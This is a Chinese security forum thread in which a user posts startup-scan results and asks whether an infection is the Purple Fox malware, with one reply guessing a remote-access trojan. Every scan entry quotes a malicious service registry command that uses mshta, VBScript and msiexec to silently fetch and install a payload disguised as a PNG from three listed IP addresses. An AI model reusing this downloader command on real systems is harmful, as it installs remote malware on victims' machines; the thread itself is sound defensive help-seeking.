这是什么病毒？也是紫狐病毒吗？

显示全部楼层 · 发表于 2022-1-6 16:20:50

本帖最后由沧桑浪子于 2022-1-6 16:59 编辑

类型:无需启动的程序-建议禁止开机自动运行的程序
描述:此类程序为未知且非必需的开机自动运行程序，存在潜在安全风险，且会影响系统的运行速度。如果您确认其需要自动运行，请加入“信任程序列表”。
扫描引擎:云安全引擎
文件路径:C:\Windows\system32\Msiexec.exe
文件大小:71.5K (73,216 字节)
文件版本:5.0.7601.24407 (win7sp1_ldr_escrow.190315-1900)
文件描述:Windows? installer
文件指纹（MD5）:e4540954bedde7872a96ebb4b7292c2f
组别:服务
数字签名:Microsoft Windows
数字签名是否有效:有效
注册表路径:HKLM\SYSTEM\CurrentControlSet\Services\AC08
注册表名称:ImagePath
注册表值:mshta.exe vbscript:createobject("wscript.shell").run("Cmd /c for /d %i in (117.187.136.141:13405 177.137.96.14:12264 61.174.50.5:13321 ) do Msiexec /i http://%i/20AC0B78.Png /Q",0)(window.close)
处理建议:禁止自启动

类型:无需启动的程序-建议禁止开机自动运行的程序
描述:此类程序为未知且非必需的开机自动运行程序，存在潜在安全风险，且会影响系统的运行速度。如果您确认其需要自动运行，请加入“信任程序列表”。
扫描引擎:云安全引擎
文件路径:C:\Windows\system32\mshta.exe
文件大小:13K (13,312 字节)
文件版本:11.00.9600.16428 (winblue_gdr.131013-1700)
文件描述:Microsoft (R) HTML Application host
文件指纹（MD5）:abdfc692d9fe43e2ba8fe6cb5a8cb95a
组别:服务
数字签名:Microsoft Windows
数字签名是否有效:有效
注册表路径:HKLM\SYSTEM\CurrentControlSet\Services\AC08
注册表名称:ImagePath
注册表值:mshta.exe vbscript:createobject("wscript.shell").run("Cmd /c for /d %i in (117.187.136.141:13405 177.137.96.14:12264 61.174.50.5:13321 ) do Msiexec /i http://%i/20AC0B78.Png /Q",0)(window.close)
处理建议:禁止自启动

类型:无需启动的程序-建议禁止开机自动运行的程序
描述:此类程序为未知且非必需的开机自动运行程序，存在潜在安全风险，且会影响系统的运行速度。如果您确认其需要自动运行，请加入“信任程序列表”。
扫描引擎:云安全引擎
文件路径:C:\Windows\system32\Cmd.exe
文件大小:295.5K (302,592 字节)
文件版本:6.1.7601.17514 (win7sp1_rtm.101119-1850)
文件描述:Windows Command Processor
文件指纹（MD5）:ad7b9c14083b52bc532fba5948342b98
组别:服务
数字签名:Microsoft Windows
数字签名是否有效:有效
注册表路径:HKLM\SYSTEM\CurrentControlSet\Services\AC08
注册表名称:ImagePath
注册表值:mshta.exe vbscript:createobject("wscript.shell").run("Cmd /c for /d %i in (117.187.136.141:13405 177.137.96.14:12264 61.174.50.5:13321 ) do Msiexec /i http://%i/20AC0B78.Png /Q",0)(window.close)
处理建议:禁止自启动

显示全部楼层 · 发表于 2022-1-6 16:30:11

本帖最后由 00006666 于 2022-1-6 21:16 编辑

应该是RAT，vbscript那里看着有点像。

[讨论] 这是什么病毒？也是紫狐病毒吗？